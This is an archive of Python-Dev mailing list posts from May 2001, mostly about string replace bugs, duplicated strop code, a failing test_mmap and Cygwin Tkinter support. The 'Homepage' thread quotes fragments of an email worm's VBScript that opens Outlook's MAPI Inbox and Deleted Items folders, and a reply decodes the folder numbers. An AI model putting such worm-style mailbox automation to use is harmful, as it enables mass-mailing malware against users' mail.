patch, because I noticed this when cvs update conflicted with what I
had in Modules/termios.c... oops.

>   I'm checking in a different patch -- essentially,
> PyObject_AsFileDescriptor() does the right thing, and we don't ever
> need to second guess it.

I was a bit concerned that the error should contain the function name.
On reflection, I agree that the code is so much simpler that it's a
win.

Cheers,
M.

-- 
  Java sucks. [...] Java on TV set top boxes will suck so hard it
  might well inhale people from off  their sofa until their heads
  get wedged in the card slots.              --- Jon Rabone, ucam.chat


From paulp@ActiveState.com  Wed May  9 21:48:38 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Wed, 09 May 2001 13:48:38 -0700
Subject: [Python-Dev] test_urllib2 fails on Win98SE
References: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>
Message-ID: <3AF9AD26.AC6DD323@ActiveState.com>

Tim Peters wrote:
> 
>...
> 
> Here's what I know about file URLs on Windows: .

We constantly run into these problems with Komodo. The long and short is
that file URL handling on Windows is totally different than on Unix and
platform-specific code is probably appropriate.

Here's what I know: IE treats the following equivalently:

c:\temp\diff.txt
file:c:\temp\diff.txt
file:/c:\temp\diff.txt
file://c:\temp\diff.txt
file:///c:\temp\diff.txt
file:///////////////////////////////c:\temp\diff.txt

You can also reverse backslashes to slashes and slashes to backslashes
if you like. Interestingly, though, UNC paths seem to work okay (no
matter how you do the slashes and backslashes):

file://americano\home\paulp\foo.html

UNC paths seem to only allow two leading slashes/backslashes.

Truly this is a new level of "be liberal in what you accept". The
algorithm is probably something like:

 1. normalize to forward slashes. 
 2. Remove "file:". 
 3. What you have left should be of the form:

//machine/path

or 

(/*)x:/path

Where x is the drive letter.

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From fredrik@effbot.org  Thu May 10 00:19:40 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Thu, 10 May 2001 01:19:40 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <E14xcwW-0004E4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>

tim wrote:

> Modified Files:
> stropmodule.c 
> Log Message:
> SF bug #422088: [OSF1 alpha] string.replace().
> Platform blew up on "123".replace("123", "").  Michael Hudson pinned the
> blame on platform malloc(0) returning NULL.

any reason why the

#ifdef MALLOC_ZERO_RETURNS_NULL

macro (in pyport.h) isn't set / doesn't take care of this?

(and is it just me, or does the strop.replace function allocate
a buffer, copy the result to that buffer, only to copy it into a
string and throw the buffer away?  no wonder u"".replace() is
30% faster than "".replace() ;-)

Cheers /F


From tim@digicool.com  Thu May 10 00:39:08 2001
From: tim@digicool.com (Tim Peters)
Date: Wed, 9 May 2001 19:39:08 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>

[Fredrik Lundh]
> any reason why the
>
> #ifdef MALLOC_ZERO_RETURNS_NULL
>
> macro (in pyport.h) isn't set / doesn't take care of this?

The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up
being plain malloc.  As Michael noted in the bug report, it could have used
PyMem_Malloc() instead and avoided the problem.  But I chose not to do that,
since special-casing a result of 0 was more efficient for reasons other than
malloc.  However:

> (and is it just me, or does the strop.replace function allocate
> a buffer, copy the result to that buffer, only to copy it into a
> string and throw the buffer away?

Yes.  And I'm returning something now that musn't be free()'ed when the
result length is 0.  Will fix.

> no wonder u"".replace() is 30% faster than "".replace() ;-)

For a given number of characters or bytes <wink>?


From tim.one@home.com  Thu May 10 00:46:13 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 19:46:13 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>

Oh, fuck.  Somebody remind me why we have both stropmodule.c and
stringobject.c?  These bugs exist in both.


From mike.mellor@tbe.com  Thu May 10 01:16:28 2001
From: mike.mellor@tbe.com (mike.mellor@tbe.com)
Date: Thu, 10 May 2001 00:16:28 -0000
Subject: [Python-Dev] CygWin and Tkinter
Message-ID: <9dcmks+6aqf@eGroups.com>

I am playing around with CygWin (which came with Pyhton 2.1 
installed).  While I can run command line programs, Tkinter is not 
part of the package.  TCL/TK is installed and I have been able to 
build TK GUI's.  How can I get Tkinter added to my Python package?  
Thanks.

Mike


From tim.one@home.com  Thu May 10 01:47:52 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 20:47:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>

test_strop.py contains this line:

    test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)

string_tests.py has this:

    test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)

IOW, the test suite insists that

    strop.replace('one!two!three!', '!', '@', 0)

replace all matches but that

    string.replace('one!two!three!', '!', '@', 0)
and
    'one!two!three!'.replace('!', '@', 0)

replace nothing.

I've been thrashing like a madman trying to fix a common bug in both modules
(in out-of-synch copies of mymemreplace), and every time I think I fix
something "the other" module breaks.  The above appears to be why.

My opinion:  the test_strop.py test is in error, and so was strop_replace()
in stropmodule.c.  I'm checking in changes accordingly, but won't mind
getting yelled at if you disagree.


From greg@cosc.canterbury.ac.nz  Thu May 10 01:56:12 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 10 May 2001 12:56:12 +1200 (NZST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>
Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one@home.com>:

>		PyObject *t = (PyObject *)op;
>    		PyString_InternInPlace(&t);

If you want to keep it all on one line, you could try

	PyString_InternInPlace((PyObject **)&op);

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@digicool.com  Thu May 10 03:00:36 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:00:36 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400."
 <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>

> Oh, fuck.  Somebody remind me why we have both stropmodule.c and
> stringobject.c?  These bugs exist in both.

In my mind, strop is obsolete.  We keep it around because some losers
like to import it directly, but it's basically dead, and except for a
few functions, string.py doesn't use it any more.  (The exceptions are
maketrans, lowercase, uppercase, whitespace.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Thu May 10 03:01:20 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:01:20 -0500
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT."
 <9dcmks+6aqf@eGroups.com>
References: <9dcmks+6aqf@eGroups.com>
Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>

> I am playing around with CygWin (which came with Pyhton 2.1 
> installed).  While I can run command line programs, Tkinter is not 
> part of the package.  TCL/TK is installed and I have been able to 
> build TK GUI's.  How can I get Tkinter added to my Python package?  
> Thanks.

Beats me.  Ask whoever produces the CygWin port.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Thu May 10 02:07:40 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 21:07:40 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDNKBAA.tim.one@home.com>

>>		PyObject *t = (PyObject *)op;
>>   		PyString_InternInPlace(&t);

[Greg Ewing]
> If you want to keep it all on one line, you could try
>
> 	PyString_InternInPlace((PyObject **)&op);

op is declared "register" so it's not strictly legal to apply the address-of
operator to it regardless.  Besides, Guido pays me by the line <wink>.

or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly
    y'rs  - tim


From gward@python.net  Thu May 10 02:08:58 2001
From: gward@python.net (Greg Ward)
Date: Wed, 9 May 2001 21:08:58 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <20010509210858.A3467@gerg.ca>

On 09 May 2001, Guido van Rossum said:
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
imported, except when imported by string.py.  (No idea how you'd
implement that, I'm just spouting off.)  Then it could go away in 2.3.

I don't think there's anything particularly controversial about 'strop'
going away after one release with a deprecation warning -- it's not
'string', after all!  (Ie. imported by every single scrap of Python code
ever written before string methods came along, and by quite a lot since
then.)

        Greg
-- 
Greg Ward - nerd                                        gward@python.net
http://starship.python.net/~gward/
I joined scientology at a garage sale!!


From guido@digicool.com  Thu May 10 03:12:55 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:12:55 -0500
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400."
 <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>
Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>

> test_strop.py contains this line:
> 
>     test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)
> 
> string_tests.py has this:
> 
>     test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)
> 
> IOW, the test suite insists that
> 
>     strop.replace('one!two!three!', '!', '@', 0)
> 
> replace all matches but that
> 
>     string.replace('one!two!three!', '!', '@', 0)
> and
>     'one!two!three!'.replace('!', '@', 0)
> 
> replace nothing.
> 
> I've been thrashing like a madman trying to fix a common bug in both modules
> (in out-of-synch copies of mymemreplace), and every time I think I fix
> something "the other" module breaks.  The above appears to be why.
> 
> My opinion:  the test_strop.py test is in error, and so was strop_replace()
> in stropmodule.c.  I'm checking in changes accordingly, but won't mind
> getting yelled at if you disagree.

HMMMMMM!  In Python 1.5, a count of zero always replaces all
occurrences, both using string and using strop.  In 2.0 and later,
strop's replace(..., 0) still replaces all, but string's replaces
none.  The replace() method of strings and unicode objects agrees with
string.py.

I think this change was made in the sake of ease of documenting the
behavior: special-casing the count of zero is unexpected.

I very vaguely recall that it was discussed on this list.

So this suggests that test_string is correct, and string.replace()
(and the methods) shouldn't be "fixed"!

But since we're not really supporting strop any more, I think that
strop shouldn't be changed either.  So we'll have to live with the
difference -- sorry!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Thu May 10 02:13:20 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 21:13:20 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>

[Guido]
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

So if Fred changes the docs to say it's obsolete, maybe we can actually rip
out the buggy and redundant code it contains in about 2 years <wink>.

cheeredly y'rs  - tim


From guido@digicool.com  Thu May 10 03:25:43 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:25:43 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400."
 <20010509210858.A3467@gerg.ca>
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
 <20010509210858.A3467@gerg.ca>
Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com>

> Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
> imported, except when imported by string.py.  (No idea how you'd
> implement that, I'm just spouting off.)  Then it could go away in 2.3.

I have had the necessary mods sitting in my directory for months (it
was one of my first tests for using the warnings module), but decided
against checking it in because I found there's quite a bit of code
that triggered the warnings.  Maybe I should check it in into 2.2a0,
so developers can get used to it.

> I don't think there's anything particularly controversial about 'strop'
> going away after one release with a deprecation warning -- it's not
> 'string', after all!  (Ie. imported by every single scrap of Python code
> ever written before string methods came along, and by quite a lot since
> then.)

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Thu May 10 03:27:23 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:27:23 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400."
 <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>

> [Guido]
> > In my mind, strop is obsolete.  We keep it around because some losers
> > like to import it directly, but it's basically dead, and except for a
> > few functions, string.py doesn't use it any more.  (The exceptions are
> > maketrans, lowercase, uppercase, whitespace.)
> 
> So if Fred changes the docs to say it's obsolete, maybe we can actually rip
> out the buggy and redundant code it contains in about 2 years <wink>.

Yes, but in the mean time the fact that it's buggy doesn't bother me
at all.  Let it be as buggy as it always was -- that's one more reason
to stop using it! :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Thu May 10 02:33:52 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 21:33:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDPKBAA.tim.one@home.com>

[Guido]
> HMMMMMM!  In Python 1.5, a count of zero always replaces all
> occurrences, both using string and using strop.  In 2.0 and later,
> strop's replace(..., 0) still replaces all, but string's replaces
> none.  The replace() method of strings and unicode objects agrees with
> string.py.
>
> I think this change was made in the sake of ease of documenting the
> behavior: special-casing the count of zero is unexpected.

Yes, -1 == infinity is much clearer <wink>.

> I very vaguely recall that it was discussed on this list.
>
> So this suggests that test_string is correct, and string.replace()
> (and the methods) shouldn't be "fixed"!

I didn't change their behavior wrt replace()'s interpretation of count, but
to repair an unrelated bug (bogus MemoryError for an empty-string *result*)
that happened to appear in both copies of mymemreplace sitting in the code
base (one in stringobject.c, another but out-of-synch one in stropmodule.c).
That's how stropmodule got sucked into this:  to fix the gross null-string
result bug common to both.

> But since we're not really supporting strop any more, I think that
> strop shouldn't be changed either.  So we'll have to live with the
> difference -- sorry!

OK, I've restored the 0 == infinity semantics to strop.replace() and
test_strop.py, but have not backed out the null-string result fix, nor the
pain to make the mymemreplace clones identical again.


From tim.one@home.com  Thu May 10 03:00:30 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 22:00:30 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>

[Guido]
> Yes, but in the mean time the fact that it's buggy doesn't bother me
> at all.  Let it be as buggy as it always was -- that's one more reason
> to stop using it! :-)

I think that's unsustainable in this specific case:  stringobject and
stropmodule contained several utility functions with the same names that
clearly started life as identical code.  Over time they got out of synch, and
when they punched me in the face today, I had no idea which was "right" and
which "wrong".  Turned out they both had the same bug, and the clearest way
to fix it in stringobject.c without leaving a more inconsistent x-module mess
was to bring the once-common utility routines back into synch.

As /F said, though, the mymemreplace() approach is inefficient and "should
be" replaced wholesale.  If that's done in stringobject.c alone, great, then
I won't care about the legacy routines in stropmodule.c either.  What I can't
abide is having one copy of a function in the codebase work and a clone of it
not work -- unless you can keep the undocumented history of both in your mind
at all times, you're just as likely to bump into the broken one first when
searching the code base, and if you're unlucky never  even realize it is "the
broken one" (or, if you're lucky, bump into the good one too, and then pee
away time trying to understand the differences).

i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't-
    eat-it-by-mistake<wink>-ly y'rs  - tim


From Jason.Tishler@dothill.com  Thu May 10 03:06:15 2001
From: Jason.Tishler@dothill.com (Jason Tishler)
Date: Wed, 9 May 2001 22:06:15 -0400
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500
References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com>
Message-ID: <20010509220615.A1928@dothill.com>

Mike,

On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote:
> > I am playing around with CygWin (which came with Pyhton 2.1 
> > installed).  While I can run command line programs, Tkinter is not 
> > part of the package.  TCL/TK is installed and I have been able to 
> > build TK GUI's.  How can I get Tkinter added to my Python package?  
> > Thanks.
> 
> Beats me.  Ask whoever produces the CygWin port.

I am the Cygwin Python maintainer.  Please see the following for my
views on adding Tkinter support to Cygwin Python:

    http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html

If Tkinter support is important to you, then please submit the appropriate
patches for consideration to the Python Patch Manager on SourceForge.

Norman Vine has built a Cygwin Python that supports Tkinter.  See the
following for his build procedure:

    http://www.vso.cape.com/~nhv/files/python/

Perhaps you would like to collaborate with Norman on this effort?

Thanks,
Jason

-- 
Jason Tishler
Director, Software Engineering       Phone: +1 (732) 264-8770 x235
Dot Hill Systems Corp.               Fax:   +1 (732) 264-8798
82 Bethany Road, Suite 7             Email: Jason.Tishler@dothill.com
Hazlet, NJ 07730 USA                 WWW:   http://www.dothill.com


From tim.one@home.com  Thu May 10 03:54:45 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 22:54:45 -0400
Subject: [Python-Dev] test_mmap failing?
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>

I checked in a change to mmapmodule.c earlier today, to close a patch
complaining about unused vrbl warnings.

Here's the changed routine before ("value" is unused):

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        char value;
        char *where;
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                where = self->data + self->pos;
                value = (char) *(where);
                self->pos += 1;
                return Py_BuildValue("c", (char) *(where));
        } else {
               PyErr_SetString (PyExc_ValueError, "read byte out of
                                                   range");
                return NULL;
        }
}

and after:

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                char value = self->data[self->pos];
                self->pos += 1;
                return Py_BuildValue("c", value);
        } else {
                PyErr_SetString (PyExc_ValueError, "read byte out of
                                                    range");
                return NULL;
        }
}

I'll be damned if I can see any semantic difference, and test_mmap worked
fine on Windows after the change.  But Fred reported:

"""
the fix introduced breakage on Linux (kernel 2.2.17):

cj42289-a(.../python/linux-beowolf); ./python
../Lib/test/regrtest.py -v test_mmap
test_mmap
test_mmap
test test_mmap crashed -- exceptions.IOError: [Errno 22]
Invalid argument
Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 246, in runtest
    __import__(test, globals(), locals(), [])
  File "../Lib/test/test_mmap.py", line 124, in ?
    test_both()
  File "../Lib/test/test_mmap.py", line 14, in
test_both
    f.write('\0'* PAGESIZE)
IOError: [Errno 22] Invalid argument
1 test failed: test_mmap
"""

However, at the point that's failing, test_mmap hasn't even *created* an
mmap'ed file yet, let alone tried to read from it.  The only thing test_mmap
did so far is (the first comment is bogus -- that's the builtin Python open()
function):

    # Create an mmap'ed file   # THIS IS A BOGUS COMMENT
    f = open('foo', 'w+')

    # Write 2 pages worth of data to the file
    f.write('\0'* PAGESIZE)    # THIS IS THE LINE IT'S DYING ON

But having suffered too many "impossible problems" the last 36 hours, my
confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
current CVS?  Fred, are you *sure* it fails for you -- if so, does the
problem actually go away if you revert mmapmodule.c?

looking-for-sense-in-all-the-wrong-places-ly y'rs  - tim


From jeremy@digicool.com  Thu May 10 04:17:34 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Wed, 9 May 2001 23:17:34 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.2126.368714.159135@slothrop.digicool.com>

The latest CVS build works on my Linux 2.2.12 system.  No problem with
test_mmap.  But test_pty does fail with some complaints about FCNTL,
which Fred just removed.  Maybe Fred is working in an alternate
universe where test_mmap and test_pty are swapped.

Jeremy


From barry@digicool.com  Thu May 10 05:08:42 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 00:08:42 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
 <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
Message-ID: <15098.5194.677531.35326@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one@home.com> writes:

    TP> Oh, fuck.  Somebody remind me why we have both stropmodule.c
    TP> and stringobject.c?  These bugs exist in both.

IIRC, I once proposed to share code bases through elaborate
#includes and exported functions, but that never went very far.
Guido's already pronounced on this, and I'd say good riddance to
strop.

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

    GvR> Yes, but in the mean time the fact that it's buggy doesn't
    GvR> bother me at all.  Let it be as buggy as it always was --
    GvR> that's one more reason to stop using it! :-)
-----------------------------------^^^^

For a minute there, I thought you said "to strop using it". :)

-Barry


From fredrik@pythonware.com  Thu May 10 07:22:53 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Thu, 10 May 2001 08:22:53 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid>

Tim Peters wrote:
> I think that's unsustainable in this specific case:  stringobject and
> stropmodule contained several utility functions with the same names that
> clearly started life as identical code.  Over time they got out of synch, and
> when they punched me in the face today, I had no idea which was "right" and
> which "wrong".  Turned out they both had the same bug, and the clearest way
> to fix it in stringobject.c without leaving a more inconsistent x-module mess
> was to bring the once-common utility routines back into synch.
> 
> As /F said, though, the mymemreplace() approach is inefficient and "should
> be" replaced wholesale.  If that's done in stringobject.c alone, great, then
> I won't care about the legacy routines in stropmodule.c either.

as a footnote, SRE uses the same source code to generate
both 8-bit and 16-bit versions of the match engine.  I see no
reason why we cannot do the same for the string operations
(PyString, PyUnicode, and strop).

if anyone wants me to look into this, just say "go ahead".  

> > no wonder u"".replace() is 30% faster than "".replace() ;-)
> 
> For a given number of characters or bytes <wink>?

characters.  judging from the SRE benchmarks, modern platforms
can process 16-bit characters as fast as they can process 8-bit
characters.

Cheers /F


From thomas@xs4all.net  Thu May 10 10:31:38 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 10 May 2001 11:31:38 +0200
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200
References: <200105091712.TAA05172@core.inf.ethz.ch>
Message-ID: <20010510113138.K16486@xs4all.nl>

On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote:

> Set s=CreateObject("Outlook.Application")
> Set t=s.GetNameSpace("MAPI")
> Set u=t.GetDefaultFolder(6)

[..]

> Set u=t.GetDefaultFolder(3)

I know it's off-topic, but Greg started it! ;-) Does anyone know which
folders those two 'GetDefaultFolder' statements open ? I suspect it's
sent-mail and trash, or some such, but I don't know enough about Outlook to
know if it even *has* sent-mail and trash folders :)

Thanx for sending it through, Samuele, it was fun reading, and useful to our
helpdesk (especially the fact that it only sends out mails once, even though
it starts the porn page every time, and that it doesn't do anything harmful
at all.)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From MarkH@ActiveState.com  Thu May 10 11:36:13 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Thu, 10 May 2001 20:36:13 +1000
Subject: [Python-Dev] Homepage
In-Reply-To: <20010510113138.K16486@xs4all.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEEPDMAA.MarkH@ActiveState.com>

> > Set u=t.GetDefaultFolder(6)
> > Set u=t.GetDefaultFolder(3)

> I know it's off-topic, but Greg started it! ;-) Does anyone know which
> folders those two 'GetDefaultFolder' statements open ? I suspect it's
> sent-mail and trash, or some such, but I don't know enough about 
> Outlook to
> know if it even *has* sent-mail and trash folders :)

Running makepy.py over the Outlook type library yields the following:

	olFolderCalendar              =0x9        # from enum OlDefaultFolders
	olFolderContacts              =0xa        # from enum OlDefaultFolders
	olFolderDeletedItems          =0x3        # from enum OlDefaultFolders
	olFolderDrafts                =0x10       # from enum OlDefaultFolders
	olFolderInbox                 =0x6        # from enum OlDefaultFolders
	olFolderJournal               =0xb        # from enum OlDefaultFolders
	olFolderNotes                 =0xc        # from enum OlDefaultFolders
	olFolderOutbox                =0x4        # from enum OlDefaultFolders
	olFolderSentMail              =0x5        # from enum OlDefaultFolders
	olFolderTasks                 =0xd        # from enum OlDefaultFolders

So it appears the inbox and deleted items.

Mark.


From tim.one@home.com  Thu May 10 09:54:42 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 10 May 2001 04:54:42 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
Message-ID: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>

> python  ../lib/test/regrtest.py test___all__

test___all__
test test___all__ failed -- tty has no __all__ attribute
1 test failed: test___all__

C:\Code\python\dist\src\PCbuild>

I assume this is yet another case where some excruciatingly non-obvious
sequence of failing imports manages to leave behind a damaged module object
in sys.modules that prevents test___all__'s import of tty from getting the
ImportError it *ought* to get under Windows (and betting termios is the
ultimate culprit).

I've fixed enough of these.  Somebody who thinks this is "a feature" gets to
do it this time <wink/snarl>.


From guido@digicool.com  Thu May 10 14:43:07 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 08:43:07 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400."
 <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com>

> [Guido]
> > Yes, but in the mean time the fact that it's buggy doesn't bother
> > me at all.  Let it be as buggy as it always was -- that's one more
> > reason to stop using it! :-)

[Tim]
> I think that's unsustainable in this specific case: stringobject and
> stropmodule contained several utility functions with the same names
> that clearly started life as identical code.  Over time they got out
> of synch, and when they punched me in the face today, I had no idea
> which was "right" and which "wrong".  Turned out they both had the
> same bug, and the clearest way to fix it in stringobject.c without
> leaving a more inconsistent x-module mess was to bring the
> once-common utility routines back into synch.

Of course, the real bug was copy-and-paste programming.  The common
code should have been factored out rather than copied.

> As /F said, though, the mymemreplace() approach is inefficient and
> "should be" replaced wholesale.  If that's done in stringobject.c
> alone, great, then I won't care about the legacy routines in
> stropmodule.c either.  What I can't abide is having one copy of a
> function in the codebase work and a clone of it not work -- unless
> you can keep the undocumented history of both in your mind at all
> times, you're just as likely to bump into the broken one first when
> searching the code base, and if you're unlucky never even realize it
> is "the broken one" (or, if you're lucky, bump into the good one
> too, and then pee away time trying to understand the differences).

Here's an idea.  We remove stropmodule.c, and replace it with a
strop.py that issues a warning and then imports selected things from
string.py.

The only complication is that there are a few constants and one
function in strop that are still imported into string.py; I propose to
move these to an "internal" extension module (e.g. "_string").

--Guido van Rossum (home page: http://www.python.org/~guido/)


